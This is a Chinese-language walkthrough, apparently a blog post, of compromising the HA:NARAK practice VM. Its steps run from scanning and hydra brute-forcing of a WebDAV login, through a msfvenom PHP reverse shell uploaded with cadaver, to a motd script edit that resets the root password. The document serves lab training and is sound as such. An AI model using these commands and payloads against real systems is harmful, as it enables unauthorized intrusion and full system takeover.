环境下载
- 戳此进行环境下载
HA:NARAK靶机搭建
- 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可
渗透测试
信息搜集
- 用arp-scan探测一下网段内目标靶机的IP:
sudo arp-scan -l
- 得到目标靶机的IP为:
192.168.246.140
![](https://i-blog.csdnimg.cn/blog_migrate/b97167d4c1df9ab532401e441e2d4d72.png)
- 使用
nmap
扫描开放的端口:sudo nmap -sU -Pn 192.168.246.140
和sudo nmap -sU -Pn 192.168.246.140
,发现开放了22、68、69、80
四个端口
![](https://i-blog.csdnimg.cn/blog_migrate/15d9460a2991356b457da28277959221.png)
- 使用
dirb
扫描一下开放的80
端口:dirb http://192.168.246.140
![](https://i-blog.csdnimg.cn/blog_migrate/7cfc896cabbbdd7e8d08b973d19f7a5f.png)
漏洞挖掘
- 访问
192.168.246.140/webdav
发现需要用户名和密码进行登录,使用cewl
生成worldlist
后利用hydra
进行爆破,得到一组用户名和密码:yamdoot:Swarg
cewl http://192.168.246.140 -w wordlist.txt
hydra -L wordlist.txt -P wordlist.txt -f -V 192.168.246.140 http-get /webdav
![](https://i-blog.csdnimg.cn/blog_migrate/41adc4cef504f99903e8db45acce9d57.png)
getshell
- 搜索
webdav
相关漏洞利用方式后发现可以cadaver
执行put
命令来上传一个 shell- 使用
msfvenom
生成反弹 shell 的木马或者直接利用 Kali 自带的 webshell,将木马上传上去,访问该木马即可接收到反弹 shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.246.129 LPORT=1234 R > shell.php
![](https://i-blog.csdnimg.cn/blog_migrate/78c2d91d5857749a8fcb88fcc2ee2f67.png)
![](https://i-blog.csdnimg.cn/blog_migrate/12cc10c9f9494daa8fb295903561bb37.png)
提权
- 翻阅信息,在
/mnt
下发现一个文件hell.sh
,查看该文件发现一串 Brainfuck 编码,解码后得到chitragupt
![](https://i-blog.csdnimg.cn/blog_migrate/1577efff221f86af59a9e6a23c6cf4eb.png)
- 尝试利用
chitragupt
作为密码,利用 Home 目录下的用户进行登录
![](https://i-blog.csdnimg.cn/blog_migrate/9860d12d66e5bf0d7239b06f97ef8380.png)
- 用 python 起一个 http 服务,将
linpeas.sh
上传到目标靶机,并给linpeas.sh
加上权限
![](https://i-blog.csdnimg.cn/blog_migrate/1487f1229dabb96f653aa4bf785c1d2d.png)
- 运行
linpeas.sh
,发现/etc/update-motd.d/
目录下部分文件可写入
![](https://i-blog.csdnimg.cn/blog_migrate/32b478221d9220c19df41b02979580f7.png)
- 修改
etc/update-motd.d/00-header
文件,将 root 的密码修改掉
echo "echo 'root:d1no' | sudo chpasswd" >> 00-header
![](https://i-blog.csdnimg.cn/blog_migrate/2ae7027959cffeb40dd3f18de0874ddc.png)
- 重新登录 ssh,使写入的内容执行,成功拿到 root 权限
![](https://i-blog.csdnimg.cn/blog_migrate/c07d8b5735d558d0dc64af9a0ecd7e2b.png)